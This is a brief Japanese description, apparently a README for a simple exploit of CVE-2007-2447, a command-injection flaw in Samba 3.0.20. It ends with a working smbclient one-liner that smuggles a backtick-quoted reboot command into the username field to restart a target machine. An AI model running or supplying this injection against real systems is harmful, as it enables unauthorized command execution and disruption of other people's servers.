
CVE-2007-2447のシンプルなエクスプロイト
CVE-2007-2447 を利用するシンプルなエクスプロイトです。Samba 3.0.20 に存在します。
この脆弱性は、これよりも少ない手段(例えば smbclient)でも悪用できますが、多くの特殊文字がおそらく無視されるため、複雑なコマンドを実行するのは難しいと考えられます。ただし、単純なコマンド(この場合は再起動)は次のように渡すことができます:
smbclient -L <target IP> --user="/=\`reboot\`" -N